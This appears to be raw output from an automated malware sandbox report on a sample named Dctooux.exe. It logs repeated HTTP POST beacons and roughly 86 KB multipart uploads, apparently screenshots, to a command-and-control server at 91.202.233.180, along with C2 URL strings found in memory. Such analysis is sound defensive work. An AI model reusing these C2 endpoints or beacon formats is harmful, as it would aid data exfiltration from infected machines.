Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache

Source: Joe Sandbox View	ASN Name: NETERRA-ASBG NETERRA-ASBG
Source: Joe Sandbox View	ASN Name: M247GB M247GB

Source: unknown

DNS traffic detected: query: hnlhrsLvnXQMkLSbq.hnlhrsLvnXQMkLSbq replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.180

Source: C:\Windows\System32\OpenWith.exe

Code function: 20_3_00007DF4B63B21BC WSARecv,

20_3_00007DF4B63B21BC

Source: unknown

DNS traffic detected: queries for: hnlhrsLvnXQMkLSbq.hnlhrsLvnXQMkLSbq

Source: unknown

HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2949713341.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2950687213.00000000031B5000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000003.2567419623.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php/
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php3G
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=17e
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19Gf
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19IfYj
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19aeqk
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19mfuj
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1=1
Source: Dctooux.exe, 00000017.00000002.2950449104.0000000002A5E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1D
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1on
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpOF
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpT
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpc
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpded
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpic
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpoded
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpodedJdUk
